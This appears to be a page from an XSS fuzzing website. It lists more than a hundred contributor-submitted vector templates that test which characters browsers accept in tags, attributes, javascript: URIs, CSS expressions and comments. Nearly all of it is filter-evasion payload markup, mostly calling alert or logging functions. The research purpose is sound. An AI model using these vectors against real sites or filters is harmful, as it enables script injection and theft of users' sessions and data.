Featured vector
Chrome 26.0
<img src=# aaa0x0donerror="alert(1)">
<img src=# aaa0x0donerror="alert(1)">
Fuzz vector cloud
Anchor Attributes CSS Closing Comments Expando Expandos HTML JavaScript Property Protocol Script URL XSS attribute char colon cookies data dataentities datauri encoding entities entitites entity events expression firefox href img inline innerHTML meta obfusc onload padding quote regexp replacement space string style svg syntax tag tags test uri vbscript xml
2,119,178 Successful fuzzes
Fuzz Vectors
Your browser identified asDefault Browser unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Characters that break attribute names | <img src=# aaa*chr*onerror="logChr(*num*)"> | @albinowax |
| char after lt still valid html | <*chr*a href=x onerror=logChr(*num*)> | @ethicalhack3r |
| Characters allowed after string multiline separator | <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> | @tifkin_ |
| Characters allowed between attributes | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @tifkin_ |
| lt eating char log | <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> | @insertScript |
| Characters not encoded with encodeURIComponent | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| Characters not encoded with encodeURI | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| lt eating char v2 | <img src=x *chr*> onerror=logChr(*num*)> | @insertScript |
| lt eating char | <img src=x *chr*> onerror=logChr(*num*)> | @insertScript |
| Characters after javascript uri | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| characters allowd in html entities | <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| Characters before javascript uri | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| Easter challenge min sequence 2 | <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> | @garethheyes |
| Easter challenge min sequence | <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> | @garethheyes |
| SVG script | <svg><script*chr*>logChr(*num*)</script></svg> | @garethheyes |
| Entities allowed with no semi colon | htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| HTML Entity in between and | <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> | @MisterJyu |
| JS Property check middle character | <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> | @garethheyes |
| JS Property check ending character | <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> | @garethheyes |
| Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed within an attribute name (on()load) | "'><img src="xx:xx" on*chr*error="log(*num*);"> | @skeptic_fx |
| Characters transformed in expando attributes | <div id="fuzzelement*num*" expando*chr*="123">test</div> | @garethheyes |
| Expandos attributes characters removed | <div id="fuzzelement*num*" expando*chr*=123>test</div> | @garethheyes |
| Valid chars before img word in img tag | <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> | @ontrif |
| Equals equivalent signs in attributes | <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> | @WisecWisec |
| meta refresh tag content attribute url overwrite | <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> | @olemoudi |
| is my browser leaking location | <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> | @garethheyes |
| Characters between time and URL in meta redirects | <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> | @avlidienbrunn |
| Characters allowed inside jsurl | <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| justatest2 | <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> | @evilcos |
| Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Cookie fuzzing | <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> | @garethheyes |
| Tags that have the onload event | <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> | @garethheyes |
| chars allowed after colon v2 | htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; | @heyheyheyhey10 |
| chars allowed in colon v2 | htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; | @heyheyheyhey10 |
| chars allowed after colon | htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; | @heyheyheyhey10 |
| Characters consuming spaces between lt and tag name | <*chr* script>logChr(*num*)</script> | @blubbfiction |
| Characters allowed as vbscript variables | <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> | @garethheyes |
| possible chars in base64 encoding | <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> | @heyheyheyhey10 |
| Replacement for s in script tag | <*chr*cript>logChr(*num*)</script> | @blubbfiction |
| Replacement for lt in tag | *chr*script>logChr(*num*)</script> | @blubbfiction |
| Characters inside script tag name | <scr*chr*ipt>logChr(*num*)</script> | @blubbfiction |
| Characters between lt and tag name | <*chr*script>logChr(*num*)</script> | @blubbfiction |
| char for fireing onload event | <img src=*chr* onload=logChr(*num*)> | @heyheyheyhey10 |
| aaaaa | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> | @goroasd |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Entities allowed instead of colon for js protocol | htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @peksa |
| Entities allowed after js protocol | htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before js protocol | htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed inside js protocol | htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before CSS rule | htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } | @garethheyes |
| img srcX onerroralert(1) | <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> | @qbye |
| Break out of HTML element from single quoted attribute | <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> | @peksa |
| Escaped characters that break out of single quote HTML attribute | <img src='xx:x\*chr* onerror="logChr(*num*)">'> | @peksa |
| Characters that escape single quoted HTML attributes | <img src='xx:x*chr* onerror="logChr(*num*)">'> | @peksa |
| Marios challenge | <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> | @0xAli |
| Characters syntactically equivalent to double quote in HTML attributes | `"'><img src="#*chr* onerror=log(*num*)> | @p_laguna |
| Eating backslash | <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> | @garethheyes |
| Character allowed after the slash for end script tag | <script>alert(logChr(*num*))</*chr*script> | @MisterJyu |
| Character allowed before the slash for end script tag | <script>alert(logChr(*num*))<*chr*/script> | @MisterJyu |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Char that allows you to act as a slash in closing tag 2 | <script>log(*num*)<*chr*script></script> | @notxssninja |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Characters allowed as slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as gt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as lt in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as _ in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as s in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed as h in http | <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url (no slashes) | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after slash in url | <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed after colon in url | <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters allowed between slashes | <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> | @garethheyes |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| foobar | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* | @Sidhpurwala |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| Hex characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> | @garethheyes |
| Characters allowed after asterix in CSS comments | <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> | @garethheyes |
| Iframe contentDocument properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Iframe contentWindow properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Document body variables | <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Document variables | <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> | @garethheyes |
| Function variables | <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Object variables | <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Number variables | <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| String variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Regexp variables | <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Array variables | <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| Window variables | <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> | @garethheyes |
| aaaaaaaa | <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @PunchyStickMeh |
| prime browser | <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> | @thetestmanager |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Break out of title | <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> | @0xAli |
| Characters between rgb | <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> | @garethheyes |
| Characters before rgb | <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> | @garethheyes |
| Characters allowed before paren | <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> | @garethheyes |
| Characters allowed after paren rule | <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> | @garethheyes |
| Valid characters after expression 4 | <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> | @garethheyes |
| Valid characters after expression 3 | <div style="xss:expression(logChr(*num*))'*chr*junk"></div> | @garethheyes |
| Valid characters after expression 2 | <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> | @garethheyes |
| Valid characters after expression | <div style="xss:expression(logChr(*num*))*chr*junk"></div> | @garethheyes |
| Opening paren expression check | <div style="xss:expression(logChr*chr**num*))">test</div> | @garethheyes |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Quoteless attributes breaker | <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Replacement for greater than sign | *chr*script>log(*num*)</script> | @mhswende |
| Characters allowed between tag and attribute | <script*chr*type="text/javascript">log(*num*);</script> | @0xAli |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| Single quote break | <script charset='*chr*>log(*num*)</script> | @0xAli |
| Characters that close a quote | <script charset="*chr*>log(*num*)</script> | @0xAli |
| Uncode sequences generating illegitimate ASCII | <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> | @0x6D6172696F |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Events in tags with src or href that execute javascript | <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |
| Does this browser support e4x | <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> | @garethheyes |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters allowed after uri host | "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> | @jackmasa |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters not encoded by encodeURIComponent | <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters not encoded by encodeURI | <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> | @shafigullin |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Characters allowed attribute quote | "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> | @jackmasa |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters syntactically equivalent to colon in a URI | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Escape from attribute a closing tag | <a href="*chr*><script>log(*num*)</script>" /> | @shafigullin |
| Characters in script inside XML elements 004 | "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Space characters in RegExp | <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> | @shafigullin |
| Character between lt and slash in closing tag | <script>log(*num*)<*chr*/script> | @shafigullin |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS colon and expression | ABC<div style="x:*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 001 | <script src="data:text/plain,lo*chr*g(*num*)"></script> | @0x6D6172696F |
| Characters trimmed my trim | <script> if ('*chr*'.trim() === '') { log(*num*); } </script> | @shafigullin |
| Characters before paren in Javascript call | "'`><script>log*chr*(*num*)</script> | @garethheyes |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |
| Characters that close a HTML comment | --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |